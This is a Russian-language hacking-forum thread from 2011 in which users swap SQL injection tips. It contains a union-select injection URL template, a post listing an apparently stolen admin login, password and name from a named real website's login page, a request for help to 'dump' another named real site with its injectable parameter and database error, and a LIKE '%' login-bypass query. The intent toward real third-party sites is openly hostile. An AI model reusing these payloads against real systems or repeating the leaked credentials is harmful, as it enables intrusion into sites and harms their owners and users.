HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 06.02.2011, 01:00
Ne1c
Новичок
Регистрация: 26.01.2011
Сообщений: 2
С нами: 8049206

Репутация: 0
По умолчанию

Сначала узнай колонки таблицы которой хочешь. А потом как узнаешь колонки
делай такой запрос _http://xxx.com/nion+select+1,сюда имя колонки,3,4,5,6,7,8+from+table_name='сюд а имя таблицы'
 
Ответить с цитированием

  #62  
Старый 06.02.2011, 01:00
Like-Angel
Новичок
Регистрация: 30.01.2010
Сообщений: 8
С нами: 8568297

Репутация: 0
По умолчанию

Цитата:

Сообщение от Ne1c

Сначала узнай колонки таблицы которой хочешь. А потом как узнаешь колонки
делай такой запрос _http://xxx.com/nion+select+1,сюда имя колонки,3,4,5,6,7,8+from+table_name='сюд а имя таблицы'

можешь сделать видео заранее благодарен
 
Ответить с цитированием

  #63  
Старый 06.02.2011, 01:00
thref2
Участник форума
Регистрация: 08.11.2010
Сообщений: 117
С нами: 8162966

Репутация: 22
По умолчанию

http://www.raftingfedadyg.ru/admin/login.php
Data Found: pass=05081900
Data Found: nik=Петухов Владимир
Data Found: login=тетис
Data Found: ID=1
 
Ответить с цитированием

  #64  
Старый 06.02.2011, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

Если ты хочешь именно взломать, тогда используй sqlhelper, а если тренируешся, тогда всеравно используй хелпер, и составляй запросы на основе виданных тебе даных sqlhelperom!
 
Ответить с цитированием

  #65  
Старый 06.02.2011, 01:00
Like-Angel
Новичок
Регистрация: 30.01.2010
Сообщений: 8
С нами: 8568297

Репутация: 0
По умолчанию

Цитата:

Сообщение от rox@hak

Если ты хочешь именно взломать, тогда используй sqlhelper, а если тренируешся, тогда всеравно используй хелпер, и составляй запросы на основе виданных тебе даных sqlhelperom!

да я просто тренируюсь что за sqlhelper можешь дать ссылку.

Добавлено через 14 минут
да всё нашёл программу эту ну это всё хорошо хотелось бы ручками.
 
Ответить с цитированием

  #66  
Старый 06.02.2011, 01:00
Ne1c
Новичок
Регистрация: 26.01.2011
Сообщений: 2
С нами: 8049206

Репутация: 0
По умолчанию

Для тренировки лучше ручками. Если хочешь подробностей пиши в асю. Позже мб видео сниму.
 
Ответить с цитированием

  #67  
Старый 07.02.2011, 01:00
Ne1c
Новичок
Регистрация: 26.01.2011
Сообщений: 2
С нами: 8049206

Репутация: 0
По умолчанию

Like-Angel, снял видео, получилось не в лучшем качестве(( но есть как есть, сам смысл думаю понятен. Если что пиши в ЛС. Вот ссылка на само видео http://depositfiles.com/files/nvr84q4yh
 
Ответить с цитированием

  #68  
Старый 07.02.2011, 01:00
Like-Angel
Новичок
Регистрация: 30.01.2010
Сообщений: 8
С нами: 8568297

Репутация: 0
По умолчанию

Цитата:

Сообщение от Ne1c

Like-Angel, снял видео, получилось не в лучшем качестве(( но есть как есть, сам смысл думаю понятен. Если что пиши в ЛС. Вот ссылка на само видео http://depositfiles.com/files/nvr84q4yh

спасибо........

Добавлено через 2 минуты
вот парни срочно нужно слить сайт activ.kz

Цитата:

http://activ.kz/kz/?l=news&o=display&page=&idx=387%22

Цитата:


Microsoft JET Database Engine error '80040e14'

ошибка
Syntax error in string in query expression 'NEWS_ID=387";'.

/kz/_news.asp, line 255



пытался сам но не смог кто поможет ?
 
Ответить с цитированием

  #69  
Старый 07.02.2011, 01:00
Ne1c
Новичок
Регистрация: 26.01.2011
Сообщений: 2
С нами: 8049206

Репутация: 0
По умолчанию

Это не MySQL, это MSSQL
 
Ответить с цитированием

  #70  
Старый 13.02.2011, 01:00
dix2m
Новичок
Регистрация: 10.02.2011
Сообщений: 2
С нами: 8027606

Репутация: 0
По умолчанию

наверно самый ламерский вопрос.
Куда помещать или вводить SQL инъекции?
Например такую

code:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.